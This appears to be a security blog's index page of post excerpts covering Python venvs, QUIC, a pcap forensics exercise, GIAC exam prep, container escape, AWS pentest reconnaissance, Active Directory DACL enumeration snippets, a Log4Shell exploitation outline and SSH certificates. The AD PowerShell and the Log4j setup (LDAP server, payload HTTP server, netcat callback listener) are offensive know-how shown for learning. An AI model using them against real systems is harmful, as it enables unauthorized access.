Using a virtual environment (venv) in Python creates an isolated spaces for projects. Isolation ensures that each project has its own dependencies, regardless of what dependencies other projects might have.
Different projects may require different versions of libraries. Virtual environments allow you to manage these dependencies separately, avoiding conflicts.
By isolating your project environment, you ensure that global package updates or changes in one project do not break or affect other projects.
Continue reading
QUIC (Quick UDP Internet Connections) is a modern transport layer network protocol designed to improve the performance of applications running over the Internet. Developed by Google and standardized by the Internet Engineering Task Force (IETF), QUIC addresses some of the performance and security shortcomings of traditional protocols such as TCP and TLS/SSL. Here's a primer on its key features, benefits, and uses:
Supports multiple streams over a single connection, which helps reduce latency and prevents the "head-of-line blocking" issue that can occur in TCP when packet loss happens.
Incorportes encryption by default with TLS 1.3, ensuring that data is secure from the onset of communication, reducing the number of round trips needed for handshake completion.
Aims to reduce connection establishment time. In some cases, it can establish a connection and secure data transfer with zero round-trip time (0-RTT) compared to TCP's 1-RTT plus an additional round-trip for TLS handshake.
Supports connection mobility, which means it can maintain a connection even if a client's IP address changes, benefiting mobile devices that switch between different networks.
Continue reading
The following is a pcap analysis walkthrough for a course on network traffic analysis. Without the pcap file, this post will not make much sense. The purpose of the post is really just for class amusement. Much like the emails, it will self destruct over the weekend.
Someone connecting to a wifi router in the dorms sent harrassing and threatening emails to a professor. The students who had physical possession of the router allowed a wire tap to be placed on the router to capture traffic after the first message was sent. The task is to analyze the pcap from this after the second message was received to find forensic evidence that may indicate who was responsible for sending the messages.
First, there was quite a bit of traffic to sift through and with the specific transgressions in mind, I decided to first export objects.
HTML > search "www.willselfdestruct.com"
Examined associated packets: 84366. User Agent looked suspicious. Looked at MAC address. MAC address from source indicates Apple computer (does not jive with the UA String).
Note: I later learned that this was not really significant due to where the sniffer was. Nonetheless, the process did not lead me in a wrong direction.
Well first, it's not rocket science. Certification exams like the ones required for Global Information Assurance Certification (GIAC), are open notes. As with any open notes exam, the information you are expected to be able to answer is so broad that merely having access to the information in paper form isn't enough. No electronics are allowed so having a method for how you will find the information you need quickly and being quite comfy with that method will be key.
There are numerous blogs out there that provide insights as to what worked for different exam takers. Some rely heavily on having a short concise index with references to which books/pages will have the answers. Others find it more helpful to put copious amounts of content into the index itself so as to avoid a second look-up in one of the course books. Color-coding your index is often advised. Some spend extra on binding their index while others simply go in with a stack of papers. Working on what is now my third index, I decided it might be worth documenting my approach and why it works for me.
Escaping a container is when a user or process breaks out from the confines of a Docker (or other type of) container to access the host machine or other containers. It's a critical concern in container security, as it could lead to unauthorized access to the host system, data leakage, or further exploitation of the network. And that would be bad. So how does it happen?
Initial Access: This blog is just exploring the container-escaping aspect of an attack. It is assumed that access to a container at which point the attacker would gather info.
Reconnaissance: Gather information about the container environment, such as the Docker version, running services, network configuration, and mounted volumes.
This entry is comprised of just some of the basic processes for penetration testing in Amazon Web Services. Pentesting for a tenant in a cloud environment typically has a scope that includes account security, cloud service security, application logic, and business logic. Because there are many out-of-scope aspects to a cloud pentest, the Cloud Security Alliance has created the Cloud Penetration Testing Playbook. With the process outlined in this playbook, I'll be summarizing some of the steps and spend much of the focus of this post on the reconnaissance and testing portions.
digexample.comA# Query for A records (IPv4 addresses)
digexample.comMX# Query for MX records (mail exchange servers)
digexample.comNS# Query for NS records (nameservers)
digexample.comSPF# Query for SPF records (email authentication)
digexample.comTXT# Query for TXT records (text records)
digexample.comCNAME# Query for CNAME records (canonical name aliases)
This is essentially just notes taken as a result of listening to informative SANS Holiday Hack Challenge 2021 speaker, Chris Davis on Active Directory Penetration Testing and then venturing down the rabbit hole to learn more. The video is a great introduction, but these notes also include take-aways from some of other videos Chris mentioned, including one by Tim Medin that's linked below in "Kerberoasting Tools." All very informative info.
Code Snippets
You can read the DACL of an AD group object using:
# Can Use Powerview: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1# Or:$ADSI=[ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=vulns,DC=local"$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])# Or:$ldapConnString="LDAP://CN=Domain Admins,CN=Users,DC=vulns,DC=local"$domainDirEntry=New-ObjectSystem.DirectoryServices.DirectoryEntry$ldapConnString$domainDirEntry.get_ObjectSecurity().Access
In the below example, the "GenericAll" permission for the "chrisd" user to the "Domain Admins" group if the user your running it under has the "WriteDACL" permission on the "Domain Admins" group.
The Log4j vulnerability is a critical security flaw that gained widespread attention in December 2021. The exploitation of the vulnerability is often called Log4Shell as it is used to gain shell access. Log4j is a logging framework that developers use to record activity within their applications. It's part of the Apache Logging Services and the library is known for its performance and flexibility, offering various logging capabilities that have become essential in software development.
The exploit takes advantage of the way Log4j processes log messages by misusing the library's Java Naming and Directory Interface (JNDI) feature. JNDI is an API in Java that allows Java software clients to look up data and resources (such as objects) via a name. The exploit occurs when a maliciously crafted log message triggers a JNDI lookup to an attacker-controlled server, leading to the execution of arbitrary code.
There are a great many applications that rely on Log4j, but one of the most notable is Apache. Once you have identified a service that is vulnerabile, you can set up testing. Testing means getting an ldap server running to handle deserialization of the exploit which you can do through the referenced repo's .jar file. You then set up an http server on the attacker host as a means of delivering the exploit. You'll also have a netcat listener set up to receive the callback once the JNDI logging executes the exploit.
This year, I completed SANS Institute and Counter Hack's Holiday Hack Challenge. One of the speakers, Thomas Bouve, provided an excellent talk about SSH Certificates. Below are my step-by-step notes that I documented as a reference. I strongly encourage anyone interested in the topic to listen to the presentation as Thomas provides more foundational knowledge in the beginning of the video and provides more context and explanations than what I am providing here. But if you're looking for a quick copy/paste/edit of commands to get the job done, this might be a helpful reference.
Notes & Assumptions
In the example, 10.10.10.10 is the address of the server where we want to be able to SSH with a signed certificate.
The username, jesinia will be used to SSH into the server.
It is assumed that the server is rootless and that jesinia has sudo permissions on the server. If you have root access, then feel free to ignore the "sudo" references.
Commands for restarting ssh service are for Fedora or RedHat distributions. If you use a different flavor of Linux, your commands may be different for that portion.
I use vim, but you can use whichever text editor you prefer.
Notes and level of detail is purposely for a broader audience with less experience.